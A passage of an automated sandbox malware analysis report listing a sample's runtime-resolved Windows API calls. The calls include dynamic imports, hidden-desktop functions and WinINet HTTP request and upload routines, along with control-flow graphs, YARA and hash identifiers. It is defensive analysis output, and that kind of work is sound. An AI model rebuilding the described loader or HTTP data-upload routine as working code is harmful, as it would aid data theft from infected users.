                                                    • GetProcAddress.KERNEL32(75550000,00923488), ref: 00426861
                                                    • GetProcAddress.KERNEL32(75550000,009234A8), ref: 0042687A
                                                    • GetProcAddress.KERNEL32(75550000,00948188), ref: 00426892
                                                    • GetProcAddress.KERNEL32(75550000,0094E2E0), ref: 004268AA
                                                    • GetProcAddress.KERNEL32(75550000,0094AAC0), ref: 004268C3
                                                    • GetProcAddress.KERNEL32(75550000,009234E8), ref: 004268DB
                                                    • GetProcAddress.KERNEL32(75550000,0094E118), ref: 004268F3
                                                    • GetProcAddress.KERNEL32(75550000,0094E130), ref: 0042690C
                                                    • GetProcAddress.KERNEL32(75550000,0094E160), ref: 00426924
                                                    • GetProcAddress.KERNEL32(75550000,0094E280), ref: 0042693C
                                                    • GetProcAddress.KERNEL32(75550000,00923508), ref: 00426955
                                                    • GetProcAddress.KERNEL32(75550000,0094E370), ref: 0042696D
                                                    • GetProcAddress.KERNEL32(75550000,0094E208), ref: 00426985
                                                    • GetProcAddress.KERNEL32(75550000,0094E1A8), ref: 0042699E
                                                    • GetProcAddress.KERNEL32(75550000,0094E3A0), ref: 004269B6
                                                    • GetProcAddress.KERNEL32(75550000,0094E298), ref: 004269CE
                                                    • GetProcAddress.KERNEL32(75550000,0094E358), ref: 004269E7
                                                    • GetProcAddress.KERNEL32(75550000,0094E2F8), ref: 004269FF
                                                    • GetProcAddress.KERNEL32(75550000,0094E1C0), ref: 00426A17
                                                    • GetProcAddress.KERNEL32(75550000,0094E148), ref: 00426A30
                                                    • GetProcAddress.KERNEL32(75550000,0094A7B8), ref: 00426A48
                                                    • GetProcAddress.KERNEL32(75550000,0094E1F0), ref: 00426A60
                                                    • GetProcAddress.KERNEL32(75550000,0094E3B8), ref: 00426A79
                                                    • GetProcAddress.KERNEL32(75550000,009232E8), ref: 00426A91
                                                    • GetProcAddress.KERNEL32(75550000,0094E100), ref: 00426AA9
                                                    • GetProcAddress.KERNEL32(75550000,00923168), ref: 00426AC2
                                                    • GetProcAddress.KERNEL32(75550000,0094E0D0), ref: 00426ADA
                                                    • GetProcAddress.KERNEL32(75550000,0094E220), ref: 00426AF2
                                                    • GetProcAddress.KERNEL32(75550000,00923308), ref: 00426B0B
                                                    • GetProcAddress.KERNEL32(75550000,00922D68), ref: 00426B23
                                                    • LoadLibraryA.KERNEL32(0094E388,0042067A), ref: 00426B35
                                                    • LoadLibraryA.KERNEL32(0094E0E8), ref: 00426B46
                                                    • LoadLibraryA.KERNEL32(0094E178), ref: 00426B58
                                                    • LoadLibraryA.KERNEL32(0094E190), ref: 00426B6A
                                                    • LoadLibraryA.KERNEL32(0094E1D8), ref: 00426B7B
                                                    • LoadLibraryA.KERNEL32(0094E238), ref: 00426B8D
                                                    • LoadLibraryA.KERNEL32(0094E2B0), ref: 00426B9F
                                                    • LoadLibraryA.KERNEL32(0094E328), ref: 00426BB0
                                                    • GetProcAddress.KERNEL32(75750000,00922DC8), ref: 00426BCC
                                                    • GetProcAddress.KERNEL32(75750000,0094E310), ref: 00426BE4
                                                    • GetProcAddress.KERNEL32(75750000,009483D8), ref: 00426BFD
                                                    • GetProcAddress.KERNEL32(75750000,0094E250), ref: 00426C15
                                                    • GetProcAddress.KERNEL32(75750000,00922E68), ref: 00426C2D
                                                    • GetProcAddress.KERNEL32(73AA0000,0094A980), ref: 00426C4D
                                                    • GetProcAddress.KERNEL32(73AA0000,00922E88), ref: 00426C65
                                                    • GetProcAddress.KERNEL32(73AA0000,0094A8B8), ref: 00426C7E
                                                    • GetProcAddress.KERNEL32(73AA0000,0094E340), ref: 00426C96
                                                    • GetProcAddress.KERNEL32(73AA0000,0094E268), ref: 00426CAE
                                                    • GetProcAddress.KERNEL32(73AA0000,00923148), ref: 00426CC7
                                                    • GetProcAddress.KERNEL32(73AA0000,00922DE8), ref: 00426CDF
                                                    • GetProcAddress.KERNEL32(73AA0000,0094E2C8), ref: 00426CF7
                                                    • GetProcAddress.KERNEL32(757E0000,00922EA8), ref: 00426D13
                                                    • GetProcAddress.KERNEL32(757E0000,00923108), ref: 00426D2B
                                                    • GetProcAddress.KERNEL32(757E0000,0094E400), ref: 00426D44
                                                    • GetProcAddress.KERNEL32(757E0000,0094E490), ref: 00426D5C
                                                    • GetProcAddress.KERNEL32(757E0000,00922D88), ref: 00426D74
                                                    • GetProcAddress.KERNEL32(758D0000,0094AAE8), ref: 00426D94
                                                    • GetProcAddress.KERNEL32(758D0000,0094AB88), ref: 00426DAC
                                                    • GetProcAddress.KERNEL32(758D0000,0094E460), ref: 00426DC5
                                                    • GetProcAddress.KERNEL32(758D0000,00922E08), ref: 00426DDD
                                                    • GetProcAddress.KERNEL32(758D0000,00922E28), ref: 00426DF5
                                                    • GetProcAddress.KERNEL32(758D0000,0094A930), ref: 00426E0E
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E3D0), ref: 00426E2E
                                                    • GetProcAddress.KERNEL32(76BE0000,00923088), ref: 00426E46
                                                    • GetProcAddress.KERNEL32(76BE0000,00948318), ref: 00426E5F
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E478), ref: 00426E77
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E3E8), ref: 00426E8F
                                                    • GetProcAddress.KERNEL32(76BE0000,00922DA8), ref: 00426EA8
                                                    • GetProcAddress.KERNEL32(76BE0000,00922EC8), ref: 00426EC0
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E418), ref: 00426ED8
                                                    • GetProcAddress.KERNEL32(76BE0000,0094E430), ref: 00426EF1
                                                    • GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00426F07
                                                    • GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00426F1E
                                                    • GetProcAddress.KERNEL32(76BE0000,CloseDesktop), ref: 00426F35
                                                    • GetProcAddress.KERNEL32(75670000,00922FA8), ref: 00426F51
                                                    • GetProcAddress.KERNEL32(75670000,0094E448), ref: 00426F69
                                                    • GetProcAddress.KERNEL32(75670000,0094E9B8), ref: 00426F82
                                                    • GetProcAddress.KERNEL32(75670000,0094E8B0), ref: 00426F9A
                                                    • GetProcAddress.KERNEL32(75670000,0094E868), ref: 00426FB2
                                                    • GetProcAddress.KERNEL32(759D0000,00922EE8), ref: 00426FCE
                                                    • GetProcAddress.KERNEL32(759D0000,00922E48), ref: 00426FE6
                                                    • GetProcAddress.KERNEL32(76D80000,00922F08), ref: 00427002
                                                    • GetProcAddress.KERNEL32(76D80000,0094EA78), ref: 0042701A
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922F28), ref: 0042703A
                                                    • GetProcAddress.KERNEL32(6F7E0000,00923028), ref: 00427052
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922FC8), ref: 0042706B
                                                    • GetProcAddress.KERNEL32(6F7E0000,0094E970), ref: 00427083
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922F48), ref: 0042709B
                                                    • GetProcAddress.KERNEL32(6F7E0000,00923068), ref: 004270B4
                                                    • GetProcAddress.KERNEL32(6F7E0000,00922F68), ref: 004270CC
                                                    • GetProcAddress.KERNEL32(6F7E0000,00923048), ref: 004270E4
                                                    • GetProcAddress.KERNEL32(6F7E0000,InternetSetOptionA), ref: 004270FB
                                                    • GetProcAddress.KERNEL32(6F7E0000,HttpQueryInfoA), ref: 00427112
                                                    • GetProcAddress.KERNEL32(75480000,0094EA18), ref: 0042712E
                                                    • GetProcAddress.KERNEL32(75480000,00948338), ref: 00427146
                                                    • GetProcAddress.KERNEL32(75480000,0094E958), ref: 0042715F
                                                    • GetProcAddress.KERNEL32(75480000,0094E8E0), ref: 00427177
                                                    • GetProcAddress.KERNEL32(753B0000,00923008), ref: 00427193
                                                    • GetProcAddress.KERNEL32(6C7D0000,0094E988), ref: 004271AF
                                                    • GetProcAddress.KERNEL32(6C7D0000,00922FE8), ref: 004271C7
                                                    • GetProcAddress.KERNEL32(6C7D0000,0094EA48), ref: 004271E0
                                                    • GetProcAddress.KERNEL32(6C7D0000,0094E928), ref: 004271F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$P2Wu$1Wu
                                                    • API String ID: 2238633743-1673689602
                                                    • Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                    • Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
                                                    • Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
                                                    • Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0
                                                    Function 0041F300 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1164stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
                                                    • lstrlenA.KERNEL32(0042D01C), ref: 0041F357
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
                                                    • lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
                                                    • lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
                                                    • lstrlenA.KERNEL32(00923268), ref: 0041F476
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F506
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
                                                    • lstrlenA.KERNEL32(00948378), ref: 0041F8C2
                                                    • lstrcpy.KERNEL32(00000000,00948378), ref: 0041F8EF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F966
                                                    • lstrcpy.KERNEL32(00000000,00948378), ref: 0041FA28
                                                    • lstrcpy.KERNEL32(00000000,009482D8), ref: 0041FA58
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
                                                    • lstrlenA.KERNEL32(00948248), ref: 0041FC03
                                                    • lstrcpy.KERNEL32(00000000,00948248), ref: 0041FC30
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen
                                                    • String ID: ERROR
                                                    • API String ID: 367037083-2861137601
                                                    • Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                    • Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
                                                    • Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
                                                    • Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99
                                                    Function 004056C0 Relevance: 98.7, APIs: 51, Strings: 5, Instructions: 734stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1467 4056c0-4056e4 call 402840 1470 4056f5-4056fb call 404ae0 1467->1470 1471 4056e6-4056eb 1467->1471 1474 405700-405760 call 424090 lstrlenA call 424090 1470->1474 1471->1470 1472 4056ed-4056ef lstrcpy 1471->1472 1472->1470 1479 405762-40576a 1474->1479 1480 40576c-40577c call 402840 1474->1480 1479->1479 1479->1480 1483 40578a-405795 1480->1483 1484 40577e-405784 lstrcpy 1480->1484 1485 405797 1483->1485 1486 4057ad-4057bb call 402840 1483->1486 1484->1483 1487 4057a0-4057a8 1485->1487 1491 4057c9-4057d1 1486->1491 1492 4057bd-4057c3 lstrcpy 1486->1492 1487->1487 1489 4057aa 1487->1489 1489->1486 1493 4057d3-4057db 1491->1493 1494 4057dd-4057eb call 402840 1491->1494 1492->1491 1493->1493 1493->1494 1497 4057f9-405804 1494->1497 1498 4057ed-4057f3 lstrcpy 1494->1498 1499 405813-405820 call 402840 1497->1499 1500 405806-40580e 1497->1500 1498->1497 1504 405822-405828 lstrcpy 1499->1504 1505 40582e-405839 1499->1505 1500->1500 1501 405810 1500->1501 1501->1499 1504->1505 1506 40583b 1505->1506 1507 40584d-40585a call 402840 1505->1507 1508 405840-405848 1506->1508 1512 405868-40589a InternetOpenA StrCmpCA 1507->1512 1513 40585c-405862 lstrcpy 1507->1513 1508->1508 1510 40584a 1508->1510 1510->1507 1514 4058a3-4058a5 1512->1514 1515 40589c 1512->1515 1513->1512 1516 405f34-405ff3 InternetCloseHandle call 402930 * 17 1514->1516 1517 4058ab-4058d3 call 423e10 call 402840 1514->1517 1515->1514 1526 4058f3-4058f8 1517->1526 1527 4058d5-4058d7 1517->1527 1530 4058fa call 402930 1526->1530 1531 4058ff-40590c call 402840 1526->1531 1527->1526 1529 4058d9-4058dc 1527->1529 1529->1526 1533 4058de-4058f0 lstrcpy lstrcatA 1529->1533 1530->1531 1540 40591a-405945 call 402930 * 2 lstrlenA call 402840 1531->1540 1541 40590e-405910 1531->1541 1533->1526 1556 405962-405970 call 402840 1540->1556 1557 405947-40594c 1540->1557 1541->1540 1544 405912-405914 lstrcpy 1541->1544 1544->1540 1564 405972-405974 1556->1564 1565 40598f-4059a9 lstrlenA call 402840 1556->1565 1557->1556 1559 40594e-40595c lstrcpy lstrcatA 1557->1559 1559->1556 1564->1565 1568 405976-40597a 1564->1568 1572 4059c3-4059c8 1565->1572 1573 4059ab-4059ad 1565->1573 1568->1565 1571 40597c-405989 lstrcpy lstrcatA 1568->1571 1571->1565 1576 4059ca call 402930 1572->1576 1577 4059cf-4059dc call 402840 1572->1577 1573->1572 1575 4059af-4059bd lstrcpy lstrcatA 1573->1575 1575->1572 1576->1577 1585 4059ea-405a1e call 402930 * 3 lstrlenA call 402840 1577->1585 1586 4059de-4059e0 1577->1586 1604 405a20-405a25 1585->1604 1605 405a3b-405a4d call 402840 1585->1605 1586->1585 1588 4059e2-4059e4 lstrcpy 1586->1588 1588->1585 1604->1605 1606 405a27-405a29 1604->1606 1610 405a6c-405a71 1605->1610 1611 405a4f-405a51 1605->1611 1606->1605 1608 405a2b-405a35 lstrcpy lstrcatA 1606->1608 1608->1605 1613 405a73 call 402930 1610->1613 1614 405a78-405a84 call 402840 1610->1614 1611->1610 1612 405a53-405a57 1611->1612 1612->1610 1617 405a59-405a66 lstrcpy lstrcatA 1612->1617 1613->1614 1619 405a92-405ac9 call 402930 * 2 InternetConnectA 1614->1619 1620 405a86-405a88 1614->1620 1617->1610 1626 405f2e-405f31 1619->1626 1627 405acf-405b05 HttpOpenRequestA 1619->1627 1620->1619 1621 405a8a-405a8c lstrcpy 1620->1621 1621->1619 1626->1516 1628 405f27-405f28 InternetCloseHandle 1627->1628 1629 405b0b-405e64 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 4272f0 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 call 427340 call 4272b0 call 402930 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA memcpy lstrlenA memcpy lstrlenA * 2 memcpy lstrlenA HttpSendRequestA InternetReadFile 1627->1629 1628->1626 1762 405f1a-405f24 InternetCloseHandle 1629->1762 1763 405e6a 1629->1763 1762->1628 1764 405e70-405e75 1763->1764 1764->1762 1765 405e7b-405ea4 lstrlenA call 402840 1764->1765 1768 405ec2-405ec9 1765->1768 1769 405ea6-405eaa 1765->1769 1771 405ed6-405ee3 call 402840 1768->1771 1772 405ecb-405ed0 call 402930 1768->1772 1769->1768 1770 405eac-405ebc lstrcpy lstrcatA 1769->1770 1770->1768 1777 405ef1-405f14 call 402930 InternetReadFile 1771->1777 1778 405ee5-405ee7 1771->1778 1772->1771 1777->1762 1777->1764 1778->1777 1779 405ee9-405eeb lstrcpy 1778->1779 1779->1777
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 004056EF
                                                    • lstrlenA.KERNEL32(?), ref: 00405742
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen
                                                    • String ID: ------$"$--$------$~A
                                                    • API String ID: 367037083-2106860866
                                                    • Opcode ID: 410a932c6bab87270166b34b70898d87c953eaefeb5ca25504425efc99a93582
                                                    • Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
                                                    • Opcode Fuzzy Hash: 410a932c6bab87270166b34b70898d87c953eaefeb5ca25504425efc99a93582
                                                    • Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8
                                                    Function 00406B80 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1889 406b80-406ba4 call 402840 1892 406bb5-406bd7 call 404ae0 1889->1892 1893 406ba6-406bab 1889->1893 1897 406bd9 1892->1897 1898 406bea-406bfa call 402840 1892->1898 1893->1892 1894 406bad-406baf lstrcpy 1893->1894 1894->1892 1899 406be0-406be8 1897->1899 1902 406c08-406c35 InternetOpenA StrCmpCA 1898->1902 1903 406bfc-406c02 lstrcpy 1898->1903 1899->1898 1899->1899 1904 406c37 1902->1904 1905 406c3a-406c3c 1902->1905 1903->1902 1904->1905 1906 406c42-406c62 InternetConnectA 1905->1906 1907 406de8-406dfb call 402840 1905->1907 1908 406de1-406de2 InternetCloseHandle 1906->1908 1909 406c68-406c9d HttpOpenRequestA 1906->1909 1916 406e09-406e20 call 402930 * 2 1907->1916 1917 406dfd-406dff 1907->1917 1908->1907 1911 406ca3-406ca5 1909->1911 1912 406dd4-406dde InternetCloseHandle 1909->1912 1914 406ca7-406cb7 InternetSetOptionA 1911->1914 1915 406cbd-406ced HttpSendRequestA HttpQueryInfoA 1911->1915 1912->1908 1914->1915 1918 406d14-406d24 call 423d30 1915->1918 1919 406cef-406d13 call 427210 call 402930 * 2 1915->1919 1917->1916 1920 406e01-406e03 lstrcpy 1917->1920 1918->1919 1928 406d26-406d28 1918->1928 1920->1916 1931 406dcd-406dce InternetCloseHandle 1928->1931 1932 406d2e-406d47 InternetReadFile 1928->1932 1931->1912 1932->1931 1934 406d4d 1932->1934 1936 406d50-406d55 1934->1936 1936->1931 1938 406d57-406d7d call 427340 1936->1938 1941 406d84-406d91 call 402840 1938->1941 1942 406d7f call 402930 1938->1942 1946 406da1-406dcb call 402930 InternetReadFile 1941->1946 1947 406d93-406d97 1941->1947 1942->1941 1946->1931 1946->1936 1947->1946 1949 406d99-406d9b lstrcpy 1947->1949 1949->1946
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
                                                    • StrCmpCA.SHLWAPI(?,00950150), ref: 00406C2D
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
                                                    • HttpOpenRequestA.WININET(00000000,GET,?,0094FBE8,00000000,00000000,-00400100,00000000), ref: 00406C90
                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
                                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406DCE
                                                    • InternetCloseHandle.WININET(?), ref: 00406DD8
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406DE2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                    • String ID: ERROR$GET
                                                    • API String ID: 3687753495-3591763792
                                                    • Opcode ID: a725527196af3ae4b92051fc428e65d3a6d617651e74373eb01ce44d5f8fe4bd
                                                    • Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
                                                    • Opcode Fuzzy Hash: a725527196af3ae4b92051fc428e65d3a6d617651e74373eb01ce44d5f8fe4bd
                                                    • Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8
                                                    Function 0248003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
